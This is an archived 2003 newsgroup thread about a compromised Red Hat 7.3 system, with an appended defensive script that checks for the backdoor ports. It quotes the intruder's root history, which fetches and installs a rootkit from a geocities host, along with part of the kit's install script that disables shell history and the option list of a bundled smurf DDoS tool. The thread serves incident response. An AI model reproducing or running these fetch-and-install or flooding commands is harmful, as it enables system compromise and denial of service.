
Russian Hacker?


Ryan

Mar 24, 2003, 1:16:41 AM
Some guy got into my Red Hat 7.3 system. Here are the commands he ran
from root's history:

wget www.geocities.com/iuli4n/Ci.tgz
tar xvzf Ci.tgz
rm -rf Ci.tgz
cd rk
./install
wget www.geocities.com/iuli4n/UsE.tgz
cd ..
dir -a
wget www.geocities.com/iuli4n/UsE.tgz
tar vxzf UsE.tgz
cd rk
./install

Any idea how to clean this up? I did a search on Google, and I'm not
sure what he did, and I tried to locate the UsE.tgz file, but couldn't
find it or any files that it contains. Will updating to 8.0 solve
everything?

-Thanks in advance...

-Ryan

Andrew Lyon

Mar 24, 2003, 11:14:21 AM
> Any idea how to clean this up? I did a search on google, and I'm not
> sure what he did, and I tried to locate the UsE.tgz file, but couldn't
> find it or any files that it contains. Will updating to 8.0 solve
> everything?

It's a rootkit; your box has been compromised. Your best bet is to erase and
start again by reinstalling Red Hat.


Sþer®Ð

Mar 24, 2003, 7:15:21 PM
> Some guy got into my redhat 7.3 system. Here are the commands he ran
> from the roots history;
>
>
> Any idea how to clean this up? I did a search on google, and I'm not
> sure what he did, and I tried to locate the UsE.tgz file, but couldn't
> find it or any files that it contains. Will updating to 8.0 solve
> everything?
>
> -Thanks in advance...
>
> -Ryan

Look for open ports 1109 and 48484.
-----Ci.tgz
# This is ssh server systemwide configuration file.
Port 48484
-----UsE.tgz
# This is ssh server systemwide configuration file.
Port 48484
-----

If they're open, forget your current configuration and start installing from scratch!

First lines of the install script:

#!/bin/sh
unset HISTFILE
clear
echo
echo " This RootKit is made in Romania by [ KS ] and [ Xarian ]"
echo " Many tks to [ Megalight ] and all our friends from UnderNet"
echo " UseIT well Iulian!"
echo " EnJoY iT!"
echo
echo 'Let`s start to instal our Beauty '
USERID=`id -u`
echo "This install is ONLY for root so..."
if [ $USERID -eq 0 ]
then
echo "+++ We can go on!"
else
echo "+++ Nope, we can not go on in $USERID shell"
echo "This is an ROOTKIT you stupid and you must have uid=0"
exit
fi

It seems that, to install, you have to have root privileges. Bad config on your end, so
start all over. Updating does not resolve your problem.

It also has the Smurf DDoS exploit in it (smurf5).

Options
-p: Comma separated list of dest ports (default 7)
-r: Use random dest ports
-R: Use random src/dest ports
-s: Source port (0 for random (default))
-P: Protocols to use. Either icmp, udp or both
-S: Packet size in bytes (default 64)
-f: Filename containg packet data (not needed)
-n: Num of packets to send (0 is continuous (default))
-d: Delay inbetween packets (in ms) (default 10000)


--
EMail: LHS{$From}@RHS{$Message-ID}
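The two checks the reply above recommends (a listener on 1109 or 48484, and the kit's sshd config setting Port 48484), written out as an added shell example that is not part of the thread or of the kit; the port numbers come from the posts, while the sample listing and sshd_config text are constructed.

```shell
#!/bin/sh
# Added example: check for the two indicators named in the reply above.
# Port numbers come from the thread; the sample listing and sshd config
# below are constructed, not captured from a real host.
SUSPECT_PORTS="1109 48484"

# Read a "netstat -lnt" / "ss -lnt" style listing on stdin and print any
# line whose local address ends in one of the suspect ports.
# Exit status 0 = something matched, 1 = nothing matched.
find_suspect_listeners() {
    alternation=$(printf '%s' "$SUSPECT_PORTS" | tr ' ' '|')
    grep -E ":(${alternation})([[:space:]]|\$)"
}

# Read an sshd_config on stdin and print every "Port" value that is not 22.
# Exit status 0 = a non-default port was found, 1 = only the default.
nondefault_sshd_port() {
    awk 'BEGIN { rc = 1 }
         tolower($1) == "port" && $2 != "22" { print $2; rc = 0 }
         END { exit rc }'
}

# Constructed sample data in the shape the two functions expect.
SAMPLE_LISTING='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:48484           0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN'

SAMPLE_SSHD_CONFIG='# This is ssh server systemwide configuration file.
Port 48484
ListenAddress 0.0.0.0'

# Run both checks against the samples; on a real host feed them
# "netstat -lnt" output and the contents of each sshd_config found.
if printf '%s\n' "$SAMPLE_LISTING" | find_suspect_listeners; then
    echo "ALERT: listener on a port used by this kit"
fi
if port=$(printf '%s\n' "$SAMPLE_SSHD_CONFIG" | nondefault_sshd_port); then
    echo "ALERT: sshd configured for non-default port $port"
fi
```

The kit installs as root, and rootkits commonly replace tools such as netstat, so a clean result from the compromised box itself proves little; capture the listing from a rescue boot or confirm with a port scan from another machine.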
